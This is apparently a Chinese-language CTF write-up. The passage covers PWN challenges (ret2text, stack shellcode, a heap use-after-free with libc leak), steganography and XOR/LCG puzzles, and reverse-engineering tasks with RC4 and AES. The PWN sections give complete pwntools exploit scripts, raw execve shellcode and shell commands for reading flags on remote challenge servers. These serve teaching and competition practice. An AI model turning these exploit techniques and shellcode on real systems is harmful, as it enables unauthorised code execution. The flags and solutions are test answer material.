p.recvuntil(b"Username: ") p.send(b"admin\x00") p.recvuntil(b"Password: ") payload = b"A" * 136 payload += p64(0x40101a) # ret,对齐栈 payload += p64(0x4011f6) # backdoor p.sendline(payload) p.sendline(b"cat flag") print(p.recvrepeat(2).decode(errors="ignore")) p.interactive() </code></pre> <p>拿到flag</p> <p><img src="./images/img-49.png" alt="Figure 49" /></p> <h2>PWN-NoteService</h2> <h3>题目截图</h3> <p><img src="./images/img-50.png" alt="Figure 50" /></p> <h3>解题思路</h3> <p>对附件程序 <code>vuln</code> 做检查,可以得到:</p> <pre><code>Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) SHSTK: Enabled IBT: Enabled Stripped: No </code></pre> <p><img src="./images/img-51.png" alt="Figure 51" /></p> <p>这说明:</p> <ol> <li> <p>开启了 <code>NX</code>,不能直接在栈上执行 shellcode;</p> </li> <li> <p>没有 <code>Canary</code>,存在栈溢出时可以直接覆盖返回地址;</p> </li> <li> <p>没有 <code>PIE</code>,程序基址固定,函数地址可直接使用;</p> </li> <li> <p>题目提示“利用程序自带后门函数实现 ret2text”,因此优先寻找隐藏函数。</p> </li> </ol> <p>反汇编 <code>vuln</code> 函数:</p> <p><img src="./images/img-52.png" alt="Figure 52" /></p> <p>这里定义了 <code>0x40</code> 字节的栈缓冲区,但 <code>read\(0, buf, 0x100\)</code> 却读入 <code>0x100</code> 字节数据,明显可以覆盖保存的 <code>rbp</code> 和返回地址,形成经典栈溢出。</p> <p>程序中存在隐藏函数 <code>secret\_note</code>:</p> <p><img src="./images/img-53.png" alt="Figure 53" /></p> <p>这正是题目要求的 <code>ret2text</code> 目标函数。</p> <p>思路非常直接:</p> <ol> <li> <p>用溢出覆盖返回地址;</p> </li> <li> <p>让程序返回到 <code>secret\_note\(\)</code>;</p> </li> <li> <p>调用 <code>system\(\&amp;\#34;/bin/sh\&amp;\#34;\)</code> 拿到 shell;</p> </li> <li> <p>通过 shell 读取 <code>/flag</code>。</p> </li> </ol> <p>栈布局如下:</p> <pre><code>buf[0x40] + saved rbp[0x8] + ret addr[0x8] </code></pre> <p>所以覆盖返回地址的偏移为:</p> <pre><code>0x40 + 0x8 = 0x48 = 72 </code></pre> <p>如果直接将返回地址覆盖成 <code>secret\_note</code>,程序会在 <code>system\(\&amp;\#34;/bin/sh\&amp;\#34;\)</code> 内部崩溃。</p> <p>原因是 <code>amd64</code> 下调用某些 <code>libc</code> 函数时需要满足 <code>16</code> 字节栈对齐。这里直接 <code>ret</code> 到后门函数会导致栈对齐不满足,从而在 <code>do\_system</code> 中段错误。</p> <p>因此需要先跳一个单独的 <code>ret</code> gadget 做对齐:</p> <pre><code>ret gadget: 0x40101a secret_note: 0x401196 </code></pre> <p>最终利用链为:</p> <pre><code>'A' * 72 + p64(0x40101a) + p64(0x401196) </code></pre> <p>EXP如下:</p> <pre><code>from pwn import * host = "47.99.147.34" port = 21395 ret = 0x40101a secret_note = 0x401196 payload = b"A" * 72 + p64(ret) + p64(secret_note) p = remote(host, port) p.recvuntil(b"Leave your note:\n") p.send(payload) # 进入 /bin/sh 后读取 flag p.sendline(b"cat /flag") p.interactive() </code></pre> <p>拿到flag</p> <p><img src="./images/img-54.png" alt="Figure 54" /></p> <h2>PWN-MessageBoard</h2> <h3>题目截图</h3> <h3>解题思路</h3> <p>文件检查</p> <pre><code>$ file vuln ELF 64-bit LSB executable, x86-64, dynamically linked, not stripped $ checksec vuln Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found ← 无栈 canary,可以直接溢出 NX: NX unknown (GNU_STACK missing) PIE: No PIE (0x400000) Stack: Executable ← 栈可执行,能直接跳到 shellcode RWX: Has RWX segments </code></pre> <p>四大保护里关键的两个:没有 canary、栈可执行。结合"程序主动泄露栈地址",结论就明摆着——往栈上写shellcode,把返回地址覆盖到 shellcode 起始。</p> <p>ida打开文件分析,main函数如下</p> <p>main 只是把 stdin/stdout/stderr 关掉缓冲然后调 vuln()。</p> <p><img src="./images/img-55.png" alt="Figure 55" /></p> <p>关键函数是vuln()</p> <p><img src="./images/img-56.png" alt="Figure 56" /></p> <p>两个漏洞点合体:</p> <ol> <li> <p>printf("Buffer at: %p", buf) —— 直接泄露 buf 在栈上的地址,绕过 ASLR;</p> </li> <li> <p>read(0, buf, 0x100) —— 缓冲区只有 0x80(128)字节,却允许写 0x100(256)字节,足够把 saved RBP 和返回地址都覆盖掉。</p> </li> </ol> <p>漏洞利用思路</p> <pre><code>栈布局(从低地址到高地址): [ buf 起始 (0x80=128 字节) ][ saved RBP (8) ][ return addr (8) ][ ... ] ↑ buf 地址(被泄露) </code></pre> <p>利用步骤:</p> <ol> <li> <p>接收 Buffer at: 0x... 的输出,解析得到 buf 的栈地址。</p> </li> <li> <p>构造 payload:</p> </li> </ol> <ul> <li> <p>前 0x80 字节填 shellcode(不足用 'a' 填到 0x88,覆盖 saved RBP);</p> </li> <li> <p>接下来 8 字节写 p64(buf),把返回地址改成 shellcode 起始地址;</p> </li> </ul> <ol> <li>vuln() 函数 leave; ret 时,从 buf(也就是 shellcode)开始执行,拿到 shell。</li> </ol> <p>偏移计算:buf 在 rbp-0x80,所以 buf -&gt; saved RBP 距离是 0x80,再加 8 字节 saved RBP 就是返回地址,所以 shellcode后总共填到 0x88 字节再追加返回地址。</p> <p>解题脚本</p> <pre><code>from pwn import * context(arch="amd64", os="linux", log_level="info") p = remote("120.27.146.76", 20056) shellcode = ( b"\x48\x31\xf6" b"\x56" b"\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68" b"\x57" b"\x54" b"\x5f" b"\xb0\x3b" b"\x99" b"\x0f\x05" ) p.recvuntil(b'0x') buf = int(p.recv(12), 16) log.info("buf: " + hex(buf)) payload = shellcode.ljust(0x88, b'a') payload += p64(buf) p.sendlineafter(b"Message: ", payload) # 列根目录、找 flag 文件 p.sendline(b"ls / 2&gt;&amp;1; ls -la /flag* /home /tmp 2&gt;&amp;1; find / -maxdepth 3 -iname 'flag*' 2&gt;/dev/null") p.sendline(b"cat /flag 2&gt;&amp;1") p.sendline(b"cat /flag.txt 2&gt;&amp;1") p.sendline(b"exit") print(p.recvall(timeout=6).decode(errors="replace")) </code></pre> <p><img src="./images/img-57.png" alt="Figure 57" /></p> <p>flag{985511156b8b35d5df4a1cad23ca4603}</p> <h2>PWN-UserManager</h2> <h3>题目截图</h3> <p><img src="./images/img-58.png" alt="Figure 58" /></p> <h3>解题思路</h3> <p>题目实现了一个简易用户系统,提供四个基础功能:</p> <ul> <li> <p><code>register</code></p> </li> <li> <p><code>login</code></p> </li> <li> <p><code>delete</code></p> </li> <li> <p><code>edit</code></p> </li> </ul> <p>从功能上看只是普通的用户管理程序,但在堆对象释放和后续访问逻辑上存在明显缺陷。程序删除用户时虽然释放了对应堆块,却没有同步清空全局用户表中的指针,最终形成了一个可利用的 <strong>Use-After-Free</strong>。在此基础上,再结合堆块复用和登录逻辑中的函数指针调用,可以逐步完成地址泄露、基址计算以及控制流劫持。</p> <p>最终目标是把悬垂的用户对象伪造成一个 fake object,使程序在 <code>login</code> 阶段执行:</p> <pre><code>system("/bin/sh") </code></pre> <p>并进一步读出 flag。</p> <p>在此基础上,通过重新申请合适大小的堆块,可以使新用户的密码区复用原用户结构体所在的 chunk,从而借助 <code>edit</code> 间接改写悬垂用户对象内容。结合 <code>login</code> 中对函数指针的调用,最终可实现控制流劫持。</p> <p><img src="./images/img-59.png" alt="Figure 59" /></p> <p>利用思路如下:</p> <p>1.构造堆重叠</p> <p>先注册两个用户,再依次删除。由于旧指针仍保留在 <code>users</code> 表中,随后注册新用户时,其密码块可复用原先用户结构体所在内存区域。这样,对新用户执行 <code>edit</code>,实际上即可改写旧用户对象。</p> <p><img src="./images/img-60.png" alt="Figure 60" /></p> <p>2.构造 <code>strcmp</code> oracle</p> <p>通过伪造悬垂对象中的指针字段,使 <code>login</code> 过程中 <code>strcmp</code> 比较目标可控。根据登录成功或失败的返回结果,可以逐字节枚举目标地址内容。</p> <p>利用该 oracle:</p> <ul> <li> <p>先恢复 <code>show</code> 函数指针,计算程序基址(PIE)</p> </li> <li> <p>再读取 <code>puts@GOT</code>,恢复 libc 基址</p> </li> </ul> <p>3.劫持控制流</p> <p>得到 libc 基址后,进一步计算出 <code>system</code> 和 <code>\&amp;\#34;/bin/sh\&amp;\#34;</code> 的实际地址。随后将悬垂用户对象伪造成:</p> <ul> <li> <p><code>pass\_ptr \-\&amp;gt; \&amp;\#34;/bin/sh\&amp;\#34;</code></p> </li> <li> <p><code>show\_ptr \-\&amp;gt; system</code></p> </li> </ul> <p>再次触发 <code>login</code> 时,程序会执行:</p> <pre><code>system("/bin/sh"); </code></pre> <p>进而获取 shell 并读取 flag。</p> <p>exp如下:</p> <pre><code>#!/usr/bin/env python3 from pwn import * import time context(os="linux", arch="amd64") context.log_level = "info" HOST = "47.99.147.34" PORT = 19588 BIN_PATH = "./login" # binary offsets (PIE) SHOW_OFF = 0x9D0 PUTS_GOT_OFF = 0x201F98 # libc-2.23-0ubuntu11.3 offsets PUTS_OFF = 0x6F6A0 SYSTEM_OFF = 0x453A0 BINSH_OFF = 0x18CE57 # Heap LSBs after the UAF setup SHOW_PTR_LSB = 0x98 CHUNK_PTR_LSB = 0x80 PROMPT_T = 6 class DeadSession(Exception): """Connection died or desynced — restart from scratch.""" def open_io(local): if local: return process(BIN_PATH) return remote(HOST, PORT, timeout=12) class Exploit: def __init__(self, io): self.io = io self.io.timeout = PROMPT_T self._first_op = True # ---- low-level guards ---------------------------------------------- def _expect(self, marker, t=PROMPT_T): try: data = self.io.recvuntil(marker, timeout=t) except (EOFError, ConnectionResetError, ConnectionAbortedError, BrokenPipeError): raise DeadSession(f"EOF waiting for {marker!r}") if marker not in data: raise DeadSession(f"desync waiting for {marker!r}, tail={data[-80:]!r}") return data def _send(self, data): try: self.io.send(data) except (BrokenPipeError, ConnectionAbortedError, ConnectionResetError): raise DeadSession("write failed") def _sendline(self, data): self._send(data + b"\n") def _menu(self): self._expect(b"Your choice:") # ---- menu primitives ----------------------------------------------- def register(self, idx, length, data): if not self._first_op: self._menu() self._first_op = False self._sendline(b"2") self._expect(b"Input the user id:") self._sendline(str(idx).encode()) self._expect(b"Input the password length:") self._sendline(str(length).encode()) self._expect(b"Input password:") self._send(data) self._expect(b"Register success!") def delete(self, idx): if not self._first_op: self._menu() self._first_op = False self._sendline(b"3") self._expect(b"Input the user id:") self._sendline(str(idx).encode()) self._expect(b"Delete success!") def edit(self, idx, data): self._menu() self._sendline(b"4") self._expect(b"Input the user id:") self._sendline(str(idx).encode()) self._expect(b"Input new pass:") self._send(data) def login(self, idx, data): self._menu() self._sendline(b"1") self._expect(b"Input the user id:") self._sendline(str(idx).encode()) self._expect(b"Input the passwords length:") self._sendline(str(len(data)).encode()) self._expect(b"Input the password:") self._send(data) try: return self.io.recvuntil(b"Your choice:", timeout=PROMPT_T) except (EOFError, ConnectionResetError, ConnectionAbortedError): raise DeadSession("EOF after login") # ---- UAF setup ----------------------------------------------------- def setup(self): # password0 / user0 / password1 / user1 all into fastbin[0x20] self.register(0, 0x20, b"A" * 0x20) self.register(1, 0x20, b"B" * 0x20) self.delete(1) self.delete(0) # malloc(24) reuses user_0's freed chunk as user_2's password buffer; # malloc(0x18) reuses password_0's freed chunk as user_2's struct. # Now users[0] (dangling) overlaps user_2's password buffer, so # edit(2, ...) writes through users[0]-&gt;{password,show,length}. self.register(2, 24, bytes([CHUNK_PTR_LSB])) # ---- oracles ------------------------------------------------------- def oracle_relative(self, lsb, payload): self.edit(2, bytes([lsb])) return b"Login success!" in self.login(0, payload) def oracle_absolute(self, addr, show_addr, payload): self.edit(2, p64(addr) + p64(show_addr) + p64(0x20)) return b"Login success!" in self.login(0, payload) # ---- byte-by-byte leaks -------------------------------------------- def _leak(self, oracle, lsb_or_base, abs_mode, show_addr=None): leaked = b"" for i in range(5, -1, -1): tail = leaked + b"\x00" for guess in range(256): pwd = bytes([guess]) + tail if abs_mode: hit = oracle(lsb_or_base + i, show_addr, pwd) else: hit = oracle((lsb_or_base + i) &amp; 0xFF, pwd) if hit: leaked = bytes([guess]) + leaked log.info(f" byte {i}: 0x{guess:02x} acc={leaked.hex()}") break else: raise RuntimeError(f"failed leak at byte {i}") return u64(leaked.ljust(8, b"\x00")) def leak_pie_show(self): return self._leak(self.oracle_relative, SHOW_PTR_LSB, abs_mode=False) def leak_libc_puts(self, puts_got, show_addr): return self._leak(self.oracle_absolute, puts_got, abs_mode=True, show_addr=show_addr) # ---- finisher ------------------------------------------------------ def pop_shell(self, system_addr, binsh_addr): # The last login() consumed "Your choice:" — start fresh here. self._sendline(b"4") self._expect(b"Input the user id:") self._sendline(b"2") self._expect(b"Input new pass:") self._send(p64(binsh_addr) + p64(system_addr) + p64(8)) time.sleep(0.05) self._menu() self._sendline(b"1") self._expect(b"Input the user id:") self._sendline(b"0") self._expect(b"Input the passwords length:") self._sendline(b"8") self._expect(b"Input the password:") self._send(b"/bin/sh\x00") time.sleep(0.4) self.io.sendline( b"id; cat /flag* 2&gt;/dev/null; cat /home/*/flag* 2&gt;/dev/null; ls /" ) try: out = self.io.recvrepeat(3) log.success(f"shell output:\n{out.decode(errors='replace')}") except Exception: pass self.io.interactive() def run_round(local): io = open_io(local) try: ex = Exploit(io) ex.setup() log.info("phase 1: leak PIE via show pointer") show_addr = ex.leak_pie_show() pie = show_addr - SHOW_OFF puts_got = pie + PUTS_GOT_OFF log.success(f"show={hex(show_addr)} pie={hex(pie)} puts_got={hex(puts_got)}") log.info("phase 2: leak libc via puts@got") puts_addr = ex.leak_libc_puts(puts_got, show_addr) libc = puts_addr - PUTS_OFF system_addr = libc + SYSTEM_OFF binsh_addr = libc + BINSH_OFF log.success(f"puts={hex(puts_addr)} libc={hex(libc)} system={hex(system_addr)}") log.info("phase 3: trigger system(\"/bin/sh\")") ex.pop_shell(system_addr, binsh_addr) finally: try: io.close() except Exception: pass def main(): local = bool(args.LOCAL) rounds = int(args.ROUNDS) if args.ROUNDS else 20 for r in range(rounds): log.info(f"=== round {r + 1}/{rounds} ===") try: run_round(local) return except DeadSession as e: log.warn(f"dead session: {e}") except RuntimeError as e: log.warn(f"runtime: {e}") except Exception as e: log.warn(f"unexpected: {e!r}") time.sleep(0.5) log.error("exhausted retries") if __name__ == "__main__": main() </code></pre> <p>拿到flag</p> <p><img src="./images/img-61.png" alt="Figure 61" /></p> <h1>Misc</h1> <h2>像素中的秘密</h2> <h3>题目截图</h3> <p><img src="./images/img-62.png" alt="Figure 62" /></p> <h3>解题思路</h3> <p><strong>NG 结构拆解</strong></p> <p>PNG 的标准布局是 <code>signature\(8\) \+ chunks\.\.\.</code>,每个 chunk 形如 <code>length\(4\) \+ type\(4\) \+ data \+ crc\(4\)</code>。逐 chunk 解析后:</p> <table> <thead> <tr> <th>偏移</th> <th>chunk</th> <th>长度</th> <th>CRC 校验</th> <th>备注</th> </tr> </thead> <tbody> <tr> <td>8</td> <td>IHDR</td> <td>13</td> <td>✅ 通过</td> <td>64×64 RGB</td> </tr> <tr> <td>33</td> <td>IDAT</td> <td>124</td> <td>✅ 通过</td> <td>像素数据</td> </tr> <tr> <td>169</td> <td>IEND</td> <td>0</td> <td>✅ 通过</td> <td>PNG 结束标志</td> </tr> </tbody> </table> <p>按规范,<strong>IEND 之后不应该再有任何字节</strong>。这里多出了 64 字节,肯定是出题人塞进去的载荷。</p> <p><img src="./images/img-63.png" alt="Figure 63" /></p> <p>附加数据如下</p> <pre><code>00000000 69cb3444 e6741ecc fec75329 8b2b8b36 5de383f9 b6a8455f aa22d9fa 801804f6 7e1336a0 8483d711 bb2c210c fb1ee500 5f32e934 03862da8 e71ab15c </code></pre> <p>先验证一下图像本体没有 LSB 之类的隐写:</p> <pre><code>from PIL import Image img = Image.open("image_08.png") print(set(img.getdata())) # {(255, 255, 255)} </code></pre> <p>只有一个像素值 `(255, 255, 255)`,所以 LSB / 位平面 / 调色板这些<strong>都不可能</strong>藏数据。题目标题里的"像素"是 misdirection(误导),真正的秘密在 IEND 之外。</p> <p>对 64 字节做特征分析:</p> <pre><code>熵 (Shannon entropy) : 5.60 / 8.00 字节频率 : 大致均匀分布 可打印 ASCII 占比 : 21/64 ≈ 33% </code></pre> <p>熵 5.6 说明数据<strong>不是纯随机</strong>也不是普通文本,符合"加密数据"或"压缩数据"的特征。</p> <p>观察整体结构,把 64 字节拆成 8 段 8 字节:</p> <pre><code>0: 00 00 00 00 69 cb 34 44 ← 前 4 字节为 0,后 4 字节像 32 位整数 1: e6 74 1e cc fe c7 53 29 ← 高熵 2: 8b 2b 8b 36 5d e3 83 f9 ... </code></pre> <p>第 0 段的"4 字节零 + 4 字节随机"是非常典型的 <strong>"32 位整数用 8 字节大端存储"</strong> 模式。常见的几种可能:</p> <table> <thead> <tr> <th>解释</th> <th>后续数据</th> </tr> </thead> <tbody> <tr> <td>8 字节种子(实际 32 位)</td> <td>后 56 字节 = 流密码密文</td> </tr> <tr> <td>8 字节 IV(实际 32 位)</td> <td>后 48~56 字节 = 分组密钥密文</td> </tr> <tr> <td>8 字节长度/版本字段</td> <td>后 56 字节 = 实际载荷</td> </tr> </tbody> </table> <p><strong>56 字节不是 16 的倍数</strong> → 不太可能是 AES-CBC/ECB(块密码会要求 16 字节对齐)。</p> <p>反过来,<strong>56 字节适合流密码</strong>(任意长度都能加解密)。</p> <p>流密码用什么生成密钥流?常见的可能:</p> <ol> <li> <p><strong>LCG(线性同余生成器)</strong>——CTF 里最常见的"自实现弱 PRNG"</p> </li> <li> <p>Mersenne Twister(Python <code>random</code> 默认)</p> </li> <li> <p>xorshift 系列</p> </li> <li> <p>自定义 LFSR</p> </li> </ol> <p>LCG 的优势:实现极短、参数广为人知(C <code>rand</code>、Java、glibc、Numerical Recipes)。</p> <p>试一组<strong>最常见的 LCG 参数表</strong>:</p> <table> <thead> <tr> <th>名称</th> <th>乘数 a</th> <th>增量 c</th> <th>模数 m</th> </tr> </thead> <tbody> <tr> <td>Numerical Recipes</td> <td>1664525</td> <td>1013904223</td> <td>2³²</td> </tr> <tr> <td>glibc rand</td> <td>1103515245</td> <td>12345</td> <td>2³¹</td> </tr> <tr> <td>MS Visual C</td> <td>214013</td> <td>2531011</td> <td>2³¹</td> </tr> <tr> <td>Borland C</td> <td>22695477</td> <td>1</td> <td>2³²</td> </tr> </tbody> </table> <p>每组都试一遍:"种子 = 前 8 字节 mod 2³²,跑 56 轮取低 8 位作为密钥流,与后 56 字节 XOR"。</p> <pre><code>def try_lcg(seed, mul, add, mod, ct): x = seed % mod out = bytearray() for c in ct: x = (mul * x + add) % mod out.append(c ^ (x &amp; 0xFF)) return bytes(out) </code></pre> <p>试到 <strong>Numerical Recipes</strong> `(1664525, 1013904223, 2³²)` 时,输出变成:</p> <pre><code>b'5bctImREPUNVbqJmUNHWmXHFkVQF1qoDw5JIlf' + b'\x00' * 18 </code></pre> <p>中间结果 <code>5bctImREPUNVbqJmUNHWmXHFkVQF1qoDw5JIlf</code> 字符集是 <code>\[0\-9 a\-z A\-Z\]</code>,没有 <code>\+/=</code>。</p> <p>这正好是 <strong>base62 字母表</strong></p> <p>base62 解码:</p> <pre><code>def base62_decode(s): alpha = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" n = 0 for ch in s: n = n * 62 + alpha.index(ch) return n.to_bytes((n.bit_length() + 7) // 8, "big") </code></pre> <p>输出:</p> <p>flag{xor_with_pseudo_random}</p> <p>完整的exp</p> <pre><code> from __future__ import annotations from pathlib import Path from typing import Iterator import struct import sys PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n" B62_ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" B62_INDEX = {c: i for i, c in enumerate(B62_ALPHABET)} # Numerical Recipes 的 LCG 常数 LCG_MUL = 1664525 LCG_ADD = 1013904223 LCG_MOD = 1 &lt;&lt; 32 def extract_after_iend(path: str | Path) -&gt; bytes: data = Path(path).read_bytes() if not data.startswith(PNG_SIGNATURE): raise ValueError(f"{path} is not a PNG file") pos = len(PNG_SIGNATURE) while pos + 12 &lt;= len(data): (length,) = struct.unpack("&gt;I", data[pos:pos + 4]) chunk_type = data[pos + 4:pos + 8] end = pos + 8 + length + 4 # type(4)+data(N)+crc(4) 都已在 length 之外 if end &gt; len(data): raise ValueError( f"chunk at offset {pos} ({chunk_type!r}) overruns file" ) pos = end if chunk_type == b"IEND": return data[pos:] raise ValueError("IEND chunk not found") def lcg_keystream(seed: int) -&gt; Iterator[int]: x = seed &amp; 0xFFFFFFFF while True: x = (LCG_MUL * x + LCG_ADD) % LCG_MOD yield x &amp; 0xFF def xor_with_lcg(data: bytes, seed: int) -&gt; bytes: ks = lcg_keystream(seed) return bytes(b ^ next(ks) for b in data) def base62_decode(s: str) -&gt; bytes: n = 0 for ch in s: try: n = n * 62 + B62_INDEX[ch] except KeyError: raise ValueError(f"invalid base62 char: {ch!r}") if n == 0: return b"\x00" return n.to_bytes((n.bit_length() + 7) // 8, "big") def solve(png_path: str | Path) -&gt; str: tail = extract_after_iend(png_path) if len(tail) &lt; 8: raise ValueError(f"appended payload too short: {len(tail)} bytes") seed = int.from_bytes(tail[:8], "big") cipher = tail[8:] middle_bytes = xor_with_lcg(cipher, seed).rstrip(b"\x00") middle = middle_bytes.decode("ascii") flag = base62_decode(middle).decode("utf-8") print(f"[+] file : {png_path}") print(f"[+] tail length : {len(tail)}") print(f"[+] seed (raw) : {tail[:8].hex()}") print(f"[+] seed (eff.) : 0x{seed &amp; 0xFFFFFFFF:08x}") print(f"[+] cipher hex : {cipher.hex()}") print(f"[+] middle b62 : {middle}") print(f"[+] flag : {flag}") return flag if __name__ == "__main__": target = sys.argv[1] if len(sys.argv) &gt; 1 else solve(target) </code></pre> <p><img src="./images/img-64.png" alt="Figure 64" /></p> <h2>幻影</h2> <h3>题目截图</h3> <p><img src="./images/img-65.png" alt="Figure 65" /></p> <h3>解题思路</h3> <p>题目给的是一个bin文件</p> <p><img src="./images/img-66.png" alt="Figure 66" /></p> <p>是 RAR 文件头,但实际是个伪装的文本文件,里面包含提示 BASE64 PLUS XOR、假 flag、和真正的 base64 数据</p> <p>把 base64 解码后的前 5 字节和 flag{ 异或一下:</p> <p>密文前5字节 = 0a 00 0d 0b 17</p> <p>明文前5字节 = 66 6c 61 67 7b ('f','l','a','g','{')</p> <p>异或结果 = 6c 6c 6c 6c 6c ('l','l','l','l','l')</p> <p>说明 key 就是单字节 0x6c,循环异或整个密文</p> <p><strong>解题脚本</strong></p> <pre><code>import base64 with open('data.bin', 'rb') as f: raw = f.read() b64 = raw.split(b'\n')[-1].strip() cipher = base64.b64decode(b64) known = b'flag{' key = bytes(c ^ p for c, p in zip(cipher, known)) print('[*] recovered key bytes:', key) xor_key = key[0] flag = bytes(b ^ xor_key for b in cipher) print('[+] flag:', flag.decode()) </code></pre> <p><img src="./images/img-67.png" alt="Figure 67" /></p> <p>flag{2fdb21c8-b864-49d0-ac73-c4bc51e7e87f}</p> <h2>签到题-损坏的压缩包</h2> <h3>题目截图</h3> <p><img src="./images/img-68.png" alt="Figure 68" /></p> <h3>解题思路</h3> <p>拿到附件后,首先查看压缩包内容,发现压缩包中只有一个文件:</p> <pre><code>data.txt </code></pre> <p>解压文件:</p> <pre><code>unzip archive_04.zip </code></pre> <p>查看 <code>data\.txt</code> 内容:</p> <pre><code>cat data.txt </code></pre> <p>得到如下字符串:</p> <pre><code>bWdnbA== </code></pre> <p>尝试进行 Base64 解码:</p> <p><img src="./images/img-69.png" alt="Figure 69" /></p> <p>解码结果为:</p> <pre><code>mggl </code></pre> <p><img src="./images/img-70.png" alt="Figure 70" /></p> <p>所以flag就是</p> <pre><code>flag{mggl} </code></pre> <h2>迷宫</h2> <h3>题目截图</h3> <p><img src="./images/img-71.png" alt="Figure 71" /></p> <h3>解题思路</h3> <p>题目入口只有 layer1/data2.zip。但目录树有几个明显的"姿势":</p> <pre><code>maze_01/layer1/ ├── data2.zip ← 入口 └── data2/ └── secret3/ ├── hidden4.zip ← 第二层 zip └── hidden4/ └── .config/user/backup5/ └── vault.bin ← 终点 </code></pre> <p>三个直觉信号:</p> <ol> <li> <p>目录命名:layer/data/secret/hidden/backup + 自增数字 1→2→3→4→5,纯迷宫氛围,本身没含义。</p> </li> <li> <p>.config/user/:伪装成"配置目录",误导你以为是普通文件。</p> </li> <li> <p>zip 套 zip:data2.zip 里只有 secret3/hidden4.zip,告诉你入口只读 .zip 即可,目录树可以忽略。</p> </li> </ol> <p>010editor打开bin文件,46 字节,纯可见 ASCII</p> <p><img src="./images/img-72.png" alt="Figure 72" /></p> <p>去掉尾巴6d后直接base64</p> <p><img src="./images/img-73.png" alt="Figure 73" /></p> <p>flag{83228b2031aa650acd1f278704e74c31}</p> Polarisctf Reversehttps://blog-5w0.pages.dev/posts/polarisctf-reverse/https://blog-5w0.pages.dev/posts/polarisctf-reverse/Polarisctf Reverse CTF WriteUpTue, 31 Mar 2026 00:00:00 GMT<h1>ez_uds</h1> <p>打开一个容器,连接</p> <pre><code>ncat nc1.ctfplus.cn 12878 </code></pre> <p>得到交互界面</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-01.png" alt="Figure 1" /></p> <p>输入 27 01,得到seed</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-02.png" alt="Figure 2" /></p> <p>key的生成算法题目给了</p> <p>异或,移位,加常数,由seed得到key29 79 67 6C</p> <pre><code>def generate_seed(): return random.randint(0, 0xFFFFFFFF) def calculate_key(seed): key = seed ^ 0xA5A5A5A5 key = ((key &lt;&lt; 3) | (key &gt;&gt; 29)) &amp; 0xFFFFFFFF key = (key + 0x12345678) &amp; 0xFFFFFFFF return key </code></pre> <p>输入27 02 29 79 67 6C</p> <p>得到flag</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-03.png" alt="Figure 3" /></p> <p>polarisctf{cd0a2062-2bb9-46b6-abce-dd0b61ea0cb4}</p> <h1>Illusion</h1> <p>IDA打开main函数</p> <p>输入格式被限定为xmctf{},总长度为25,程序会把这括号里的18字节用sub_140001440加密</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-04.png" alt="Figure 4" /></p> <p>这个加密函数是非常标准的RC4,key就是nev_gona_give_up</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-05.png" alt="Figure 5" /></p> <p>按这个逻辑逆回去得到xmctf{nev_gona_letydown\x07}</p> <p>这正是这道题目的陷阱</p> <p>真正的关键在MessageBoxA,在此函数之前程序先调用了sub_140001000</p> <p>它会改写函数开头,把调用导向sub_1400010F0</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-06.png" alt="Figure 6" /></p> <p>所以接下来分析sub_1400010F0函数</p> <p>去全局Destination,对他做一次分组加密,然后和常量比较</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-07.png" alt="Figure 7" /></p> <p>如果完全相同会改标题为“real world”</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-08.png" alt="Figure 8" /></p> <p>密文</p> <pre><code>f2 7b 7e 75 b4 5c 08 fa 19 3c 8a 4a 04 f8 1f 67 1b 05 9c e7 27 40 78 6d 28 f6 a8 b8 06 c6 c5 51 </code></pre> <p>而分组加密就是AES加密,sub_140001D00生成轮密钥,sub_140001A00: 对 16 字节分组加密</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-09.png" alt="Figure 9" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-10.png" alt="Figure 10" /></p> <p>使用的key是1234123412341234AES!</p> <p>解题脚本</p> <pre><code>from __future__ import annotations from Crypto.Cipher import AES ILLUSION_TARGET = ( bytes.fromhex("d5 0a fb 84") + bytes.fromhex("0a 8f 2c e7") + bytes.fromhex("27 d9 56 3e") + bytes.fromhex("f3 6c 29 ab") + bytes.fromhex("19 54") ) ILLUSION_KEY = b"nev_gona_give_up" REAL_WORLD_KEY = bytes.fromhex("12 34 12 34 12 34 12 34 12 34 12 34 41 45 53 21") REAL_WORLD_TARGET = bytes.fromhex( "f2 7b 7e 75 b4 5c 08 fa 19 3c 8a 4a 04 f8 1f 67" " 1b 05 9c e7 27 40 78 6d 28 f6 a8 b8 06 c6 c5 51" ) def rc4_keystream(key: bytes, length: int) -&gt; bytes: s = list(range(256)) j = 0 for i in range(256): j = (j + s[i] + key[i % len(key)]) &amp; 0xFF s[i], s[j] = s[j], s[i] out = bytearray() i = 0 j = 0 for _ in range(length): i = (i + 1) &amp; 0xFF j = (j + s[i]) &amp; 0xFF s[i], s[j] = s[j], s[i] out.append(s[(s[i] + s[j]) &amp; 0xFF]) return bytes(out) def main() -&gt; None: illusion_middle = bytes( c ^ k for c, k in zip( ILLUSION_TARGET, rc4_keystream(ILLUSION_KEY, len(ILLUSION_TARGET)) ) ) illusion_flag = b"xmctf{" + illusion_middle + b"}" real_world_plain = AES.new(REAL_WORLD_KEY, AES.MODE_ECB).decrypt(REAL_WORLD_TARGET) real_world_middle = real_world_plain[:18] real_world_flag = b"xmctf{" + real_world_middle + b"}" print("illusion middle :", repr(illusion_middle)) print("illusion flag :", repr(illusion_flag)) print("real middle :", real_world_middle.decode()) print("real flag :", real_world_flag.decode()) print("real flag hex :", real_world_flag.hex()) if __name__ == "__main__": main() </code></pre> <p>xmctf{R3a1_w0rld_M47ters}</p> <h1>移动的秘密</h1> 